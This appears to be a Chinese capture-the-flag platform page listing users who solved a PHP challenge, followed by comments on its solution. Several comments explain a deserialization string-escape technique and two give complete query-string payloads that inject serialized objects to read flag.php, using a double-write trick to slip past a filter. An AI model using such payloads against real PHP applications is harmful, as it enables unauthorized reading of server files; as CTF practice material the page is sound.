评分(1)
解题动态

daqindiguo 攻破了该题 3天前

LondonBA 攻破了该题 25天前

渴死的鱼 攻破了该题 1月前

miraiz 攻破了该题 1月前

cjydawn 攻破了该题 2月前

AioKT 攻破了该题 2月前

theo1234 攻破了该题 3月前

lunarbyside 攻破了该题 3月前

nuxe 攻破了该题 3月前

18630451800 攻破了该题 4月前

GnawKing 攻破了该题 4月前

kk190 攻破了该题 4月前

Waitcat 攻破了该题 5月前

Sh_eePppp 攻破了该题 6月前

snoway34 攻破了该题 6月前

ssqs 攻破了该题 6月前

小杰罗666 攻破了该题 7月前

Deyudeyu 攻破了该题 7月前

czg9000 攻破了该题 7月前

评论
whiteHaves 1年前
举报
参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。
绝情且小帅 1年前
举报
?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
xiaobai568 1年前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 1年前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 1年前
举报
不容易啊
2728462336 1年前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 2年前
举报
反序列化字符逃逸